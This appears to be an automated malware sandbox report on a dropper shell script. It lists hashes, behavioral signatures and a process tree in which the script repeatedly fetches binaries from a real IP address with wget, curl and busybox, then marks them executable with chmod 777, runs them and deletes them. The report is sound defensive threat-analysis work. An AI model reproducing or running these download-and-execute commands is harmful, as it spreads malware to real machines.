Analysis
- max time kernel: 52s
- max time network: 57s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 14-11-2024 02:50
Tasks
- Static task static1
- Behavioral task behavioral1: sample 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh, resource ubuntu1804-amd64-20240729-en
- Behavioral task behavioral2: sample 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh, resource debian9-armhf-20240611-en
- Behavioral task behavioral3: sample 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh, resource debian9-mipsbe-20240611-en
- Behavioral task behavioral4: sample 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh, resource debian9-mipsel-20240729-en
General
- Target: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
- Size: 10KB
- MD5: aae1d5abee7934f0e4222cffef0b2329
- SHA1: 068230ae72391a90d17b4f8c26d9665b3c7971be
- SHA256: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
- SHA512: 1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
- SSDEEP: 192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 21 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes (pid, process): 21 chmod invocations, PIDs 824, 838, 875, 681, 699, 744, 792, 804, 887, 810, 849, 855, 727, 766, 798, 867, 786, 818, 830, 861, 881 (all chmod).
- Executes dropped EXE (21 IoCs)
  Processes (pid, ioc; the process name is the file's basename):
    682  /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE
    701  /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp
    729  /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK
    745  /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8
    767  /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA
    787  /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof
    793  /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ
    799  /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7
    805  /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m
    811  /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY
    819  /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk
    825  /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm
    831  /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ
    839  /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr
    850  /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m
    856  /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY
    862  /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ
    868  /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr
    876  /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk
    882  /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm
    888  /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK
- Checks CPU configuration (1 TTP, 21 IoCs)
  Checks CPU information, which indicates whether the system is a virtual machine.
  Processes (description, ioc, process): 21 curl processes, each with "File opened for reading /proc/cpuinfo".
- Reads runtime system information (42 IoCs; signature name as tagged on the curl processes in the process tree below)
  Processes (description, ioc, process): 21 curl processes; each has "File opened for reading /proc/sys/crypto/fips_enabled" and "File opened for reading /proc/self/auxv" (21 IoCs for each path).
- Writes file to tmp directory (21 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process): "File opened for modification" by curl, in the order reported, for
    /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY (twice)
    /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE
    /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp
    /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ (twice)
    /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m (twice)
    /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ
    /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk (twice)
    /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm (twice)
    /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK (twice)
    /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8
    /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA
    /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr (twice)
    /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof
    /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7
Processes
- /tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh  (depth 1, PID 648)
  - /bin/rm  rm bins.sh  (depth 2, PID 650)
  - The script then runs the same six child processes (all at depth 2) once per binary name, in the order of the table below. For each <name> the process image and command line were:
      /usr/bin/wget   wget http://216.126.231.240/bins/<name>
      /usr/bin/curl   curl -O http://216.126.231.240/bins/<name>        [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
      /bin/busybox    /bin/busybox wget http://216.126.231.240/bins/<name>
      /bin/chmod      chmod 777 <name>                                   [File and Directory Permissions Modification]
      /tmp/<name>     ./<name>                                           [Executes dropped EXE]
      /bin/rm         rm <name>

    PIDs per iteration:
     #   <name>                               wget  curl  busybox  chmod  exec  rm
     1   zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE   653   670   677      681    682   683
     2   5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp   684   685   693      699    701   702
     3   Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK   703   711   719      727    729   731
     4   8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8   733   741   743      744    745   746
     5   O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA   747   752   759      766    767   768
     6   YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof   769   776   785      786    787   788
     7   kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ   789   790   791      792    793   794
     8   pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7   795   796   797      798    799   800
     9   1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m   801   802   803      804    805   806
    10   7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY   807   808   809      810    811   812
    11   1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk   813   814   815      818    819   820
    12   uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm   821   822   823      824    825   826
    13   ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ   827   828   829      830    831   832
    14   cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr   833   836   837      838    839   840
    15   1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m   841   845   846      849    850   851
    16   7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY   852   853   854      855    856   857
    17   ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ   858   859   860      861    862   863
    18   cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr   864   865   866      867    868   869
    19   1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk   870   871   872      875    876   877
    20   uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm   878   879   880      881    882   883
    21   Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK   884   885   886      887    888   889
    22   8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8   890   (the report's process tree ends after this wget)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97